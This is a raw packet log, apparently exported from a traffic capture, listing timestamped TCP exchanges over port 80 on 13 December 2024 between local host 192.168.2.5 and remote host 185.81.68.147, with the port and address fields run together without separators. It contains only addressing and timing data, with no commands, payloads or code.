                                                                                                                                                                Dec 13, 2024 01:37:21.353782892 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.355607033 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.355721951 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.355791092 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.357621908 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.357722998 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.357850075 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.359647036 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.359718084 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.359803915 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.361665964 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.361757994 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.361865044 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.363605976 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.363734007 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.363814116 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.365617990 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.365722895 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.365778923 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.367635965 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.367748022 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.367815018 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.369616032 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.369708061 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.369750977 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.371684074 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.371750116 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.371932983 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.373601913 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.373709917 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.373763084 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.375588894 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.375643969 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.375668049 CET4971980192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.423995018 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.495457888 CET8049719185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.543813944 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:21.544856071 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.548691034 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:21.668509960 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874183893 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874234915 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874361992 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874430895 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:22.874454975 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874473095 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874519110 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:22.874588966 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874638081 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874638081 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:22.874655962 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874671936 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874748945 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:22.874826908 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.874880075 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:22.994350910 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.994370937 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:22.994443893 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:22.998425961 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.051688910 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.067622900 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.067734003 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.067805052 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.071863890 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.072005987 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.072062969 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.080375910 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.080498934 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.080563068 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.088715076 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.088799000 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.088866949 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.097060919 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.097146034 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.097208023 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.105545044 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.105626106 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.105899096 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.113915920 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.114023924 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.114249945 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.122405052 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.122488022 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.124823093 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.130789995 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.130904913 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.131206036 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.139238119 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.139281034 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.140794039 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.171487093 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.171544075 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.172278881 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.187592030 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.187666893 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.188114882 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.259597063 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.259629011 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.259701014 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.261037111 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.261163950 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.261343002 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.266077995 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.266189098 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.266417980 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.271126032 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.271224976 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.271285057 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.276006937 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.276086092 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.276139975 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.280917883 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.281039953 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.281100988 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.285753965 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.285876036 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.285950899 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.290625095 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.290725946 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.290776014 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.295517921 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.295676947 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.295747042 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.300348043 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.300462008 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.300523043 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.305231094 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.305336952 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.305404902 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.310098886 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.310244083 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.310408115 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.315011024 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.315162897 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.315218925 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.319874048 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.319972992 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.320034027 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.323698997 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.323870897 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.323918104 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.327526093 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.327647924 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.327785969 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.331378937 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.331489086 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.331546068 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.335186005 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.335294008 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.335350037 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.339025021 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.339116096 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.340773106 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.342880011 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.342974901 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.343091011 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.346705914 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.346792936 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.346923113 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.350512981 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.350692987 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.350929022 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.379621983 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.379658937 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.379731894 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.452097893 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.452260971 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.452467918 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.453581095 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.453691006 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.454787970 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.456581116 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.456675053 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.456790924 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.459496975 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.459604979 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.460768938 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.462470055 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.462605000 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.462820053 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.465337992 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.465446949 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.465532064 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.468173981 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.468274117 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.468694925 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.471005917 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.471108913 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.471220970 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.473709106 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.473803997 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.474431992 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.476397038 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.476491928 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.476778030 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.478957891 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.479075909 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.479652882 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.481599092 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.481698990 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.481897116 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.484215021 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.484296083 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.484452009 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.486732960 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.486851931 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.486911058 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.489353895 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.489459038 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.489520073 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.491947889 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.492046118 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.492774963 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.494529963 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.494630098 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.494682074 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.497128963 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.497231960 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.499710083 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.499788046 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.499805927 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.500777960 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.502295971 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.502408981 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.502465010 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.504879951 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.505006075 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.506802082 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.506875038 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.506905079 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.508711100 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.508764029 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.508833885 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.510629892 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.510680914 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.510746956 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.512522936 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.512583017 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.512665033 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.512773037 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.514439106 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.514542103 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.514615059 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.516325951 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.516638041 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.516701937 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.518249035 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.518352032 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.520128012 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.520196915 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.520230055 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.520559072 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.522063971 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.522200108 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.522274971 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.523992062 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.524090052 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.524791956 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.525866985 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.526021957 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.526092052 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.527801037 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.527883053 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.527934074 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.529676914 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.529788017 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.529860020 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.531600952 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.531704903 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.533493042 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.533566952 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.533606052 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.534857988 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.535393953 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.535489082 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.535546064 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.537334919 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.537451982 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.537522078 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.539227962 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.539350986 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.539412022 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.644520998 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.644592047 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.644826889 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.645149946 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.645302057 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.645457029 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.646806002 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.647130966 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.647206068 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.648509026 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.648628950 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.648694992 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.650132895 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.650222063 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.651717901 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.651789904 CET4972680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:23.651844978 CET8049726185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:23.652776003 CET4972680192.168.2.5185.81.68.147
